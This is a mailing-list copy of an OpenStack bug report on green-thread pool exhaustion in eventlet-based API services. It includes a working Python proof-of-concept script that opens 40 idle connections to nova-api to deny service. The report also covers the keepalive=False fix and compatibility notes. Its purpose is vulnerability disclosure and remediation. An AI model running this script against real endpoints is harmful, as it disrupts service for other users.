yahoo-eng-team team mailing list archive
Message #41142
[Bug 1361360] Re: Eventlet green threads not released back to the pool leading to choking of new requests
** Also affects: glance/juno
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1361360
Title:
Eventlet green threads not released back to the pool leading to
choking of new requests
Status in Cinder:
Fix Released
Status in Cinder icehouse series:
Fix Released
Status in Cinder juno series:
Fix Released
Status in Glance:
Fix Released
Status in Glance icehouse series:
Fix Committed
Status in Glance juno series:
New
Status in heat:
Fix Released
Status in heat kilo series:
Fix Released
Status in OpenStack Identity (keystone):
Fix Released
Status in OpenStack Identity (keystone) juno series:
Fix Committed
Status in OpenStack Identity (keystone) kilo series:
Fix Released
Status in Manila:
Fix Released
Status in neutron:
Fix Released
Status in neutron icehouse series:
Fix Released
Status in neutron juno series:
Fix Committed
Status in OpenStack Compute (nova):
Fix Released
Status in OpenStack Compute (nova) icehouse series:
Fix Released
Status in OpenStack Security Advisory:
Won't Fix
Status in OpenStack Security Notes:
Won't Fix
Status in Sahara:
Fix Committed
Bug description:
Currently reproduced on Juno milestone 2, but this issue should be
reproducible in all releases since its inception.
It is possible to choke OpenStack API controller services that use the
wsgi+eventlet library simply by not closing the client socket
connection. Whenever a request is received by any OpenStack API
service, for example the nova API service, the eventlet library takes
a green thread from the pool and starts processing the request. Even
after the response is sent to the caller, the green thread is not
returned to the pool until the client socket connection is closed. A
malicious user can therefore send many API requests to the API
controller node to determine the wsgi pool size configured for a given
service, then send that many requests and, after receiving the
responses, wait indefinitely without closing the connections,
disrupting service for other tenants. Even when service providers have
enabled rate limiting, it is possible to choke the API services with a
group attack (many tenants).
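The exhaustion described above can be illustrated with a toy model. This is only a sketch of the bookkeeping, not eventlet code: the WorkerPool class and its method names are hypothetical, and the pool size of 10 is an arbitrary choice for illustration.

```python
# Toy model (not eventlet code): each connection occupies one pool slot
# until the client closes its socket, as described in the report.


class WorkerPool(object):
    def __init__(self, size):
        self.size = size
        self.busy = set()  # ids of connections currently holding a slot

    def free(self):
        return self.size - len(self.busy)

    def accept(self, conn_id):
        """Return True if a worker was available for this connection."""
        if self.free() == 0:
            return False  # no worker left: the new request is choked
        self.busy.add(conn_id)
        return True

    def client_closed(self, conn_id):
        """The slot is returned only when the client closes its socket."""
        self.busy.discard(conn_id)


pool = WorkerPool(size=10)

# Ten clients each send one request, read the response, then sit idle.
attackers_served = [pool.accept("attacker-%d" % i) for i in range(10)]

# A legitimate request now finds no free worker.
legit_served = pool.accept("tenant-request")

# Once one idle client closes its socket, capacity comes back.
pool.client_closed("attacker-0")
legit_served_after_close = pool.accept("tenant-request")
```

In this model the number of idle connections needed to block the service equals the pool size, which is why learning the configured pool size is enough to mount the attack.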
The following program illustrates choking of the nova-api service (but
this problem is present in all other OpenStack API services using
wsgi+eventlet).
Note: I have explicitly set the wsgi_default_pool_size default value to 10 in nova/wsgi.py in order to reproduce this problem.
After you run the program below, try to invoke the API.
============================================================================================
import time
import requests
from multiprocessing import Process


def request(number):
    # The port is important here: 8774 is the default nova-api port.
    path = 'http://127.0.0.1:8774/servers'
    try:
        response = requests.get(path)
        print("RESPONSE %s-%d" % (response.status_code, number))
        # During this sleep, check on the API controller node whether
        # the client socket connection has been released.
        time.sleep(1000)
        print("Thread %d complete" % number)
    except requests.exceptions.RequestException as ex:
        print("Exception occurred %d-%s" % (number, str(ex)))


if __name__ == '__main__':
    processes = []
    # Start 40 client processes, more than the pool size of 10.
    for number in range(40):
        p = Process(target=request, args=(number,))
        p.start()
        processes.append(p)
    for p in processes:
        p.join()
================================================================================================
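One possible way to do the check mentioned in the program's comment (whether client sockets are still held on the API controller node) is to count ESTABLISHED connections on the service port. The sketch below assumes a Linux node and the /proc/net/tcp text format, where ports are hexadecimal and state 01 means ESTABLISHED. The function name count_established and the SAMPLE text are hypothetical, hand-written for illustration, and are not output captured from a real node.

```python
def count_established(proc_net_tcp_text, port):
    """Count ESTABLISHED IPv4 connections whose local port is `port`."""
    count = 0
    for line in proc_net_tcp_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4:
            continue
        # local_address looks like "0100007F:2246" (hex address:hex port)
        local_port = int(fields[1].rsplit(":", 1)[1], 16)
        state = fields[3]
        if local_port == port and state == "01":  # 01 == ESTABLISHED
            count += 1
    return count


# Hand-written sample in /proc/net/tcp layout (trailing columns trimmed).
# 0x2246 == 8774; state 0A is LISTEN, state 01 is ESTABLISHED.
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:2246 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001
   1: 0100007F:2246 0100007F:C350 01 00000000:00000000 00:00000000 00000000     0        0 1002
   2: 0100007F:2246 0100007F:C351 01 00000000:00000000 00:00000000 00000000     0        0 1003
   3: 0100007F:C350 0100007F:2246 01 00000000:00000000 00:00000000 00000000     0        0 1004
"""

established = count_established(SAMPLE, 8774)
```

On a real controller node the text would come from open('/proc/net/tcp').read(); IPv6 connections are listed separately in /proc/net/tcp6 and are not covered by this sketch. If the count stays at the pool size while the clients sleep, the connections have not been released.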
Presently, the wsgi server allows persistent connections if keepalive is set to True, which is the default.
To close the client socket connection explicitly after the response has been sent and read successfully by the client, you simply have to set keepalive to False when you create the wsgi server.
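A minimal sketch of that setting, assuming eventlet is installed. The names serve and hello_app, port 8080, and the pool size of 10 are hypothetical choices for illustration; this is not the code of any OpenStack service, which wraps its server creation in its own wsgi module.

```python
def hello_app(environ, start_response):
    """Trivial WSGI application used only for this illustration."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"ok\n"]


def serve(app, host="127.0.0.1", port=8080, pool_size=10):
    """Run `app` under eventlet's wsgi server with keepalive disabled."""
    # Imported here so the module can be loaded without eventlet present.
    import eventlet
    from eventlet import wsgi

    sock = eventlet.listen((host, port))
    pool = eventlet.GreenPool(pool_size)
    # keepalive=False makes the server close the connection after each
    # response, so the green thread goes back to the pool right away.
    wsgi.server(sock, app, custom_pool=pool, keepalive=False)


# To try it (blocks until interrupted):
#     serve(hello_app)
```

With keepalive=False the reproduction program should no longer hold pool slots during its sleep, since the server side closes each socket once the response is written.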
Additional information: By default, eventlet passes "Connection: keepalive" when a response is sent to the client if keepalive is set to True, but it does not have the capability to set the timeout and max parameters.
For example:
Keep-Alive: timeout=10, max=5
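For reference, in the Keep-Alive header the timeout parameter is the time in seconds an idle connection is kept open, and max is the number of requests allowed on the connection before it is closed. The sketch below shows how such a header value breaks down; parse_keep_alive is a hypothetical helper written for this illustration and is not part of eventlet.

```python
def parse_keep_alive(value):
    """Parse a Keep-Alive header value such as 'timeout=10, max=5'."""
    params = {}
    for item in value.split(","):
        name, sep, raw = item.strip().partition("=")
        # Keep only well-formed name=integer pairs.
        if sep and raw.strip().isdigit():
            params[name.strip().lower()] = int(raw.strip())
    return params


params = parse_keep_alive("timeout=10, max=5")
# params["timeout"]: idle seconds before the server may close the socket
# params["max"]: requests allowed on this connection before it is closed
```

A server that honoured these two limits would bound how long an idle client can hold a green thread, without giving up persistent connections entirely.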
Note: Once keepalive has been disabled in all the OpenStack API
services using the wsgi library, it might impact existing
applications built on the assumption that OpenStack API services use
persistent connections. These applications might need to be modified
if reconnection logic is not in place, and they might also experience
slower performance, because the HTTP connection will have to be
re-established for every request.
To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1361360/+subscriptions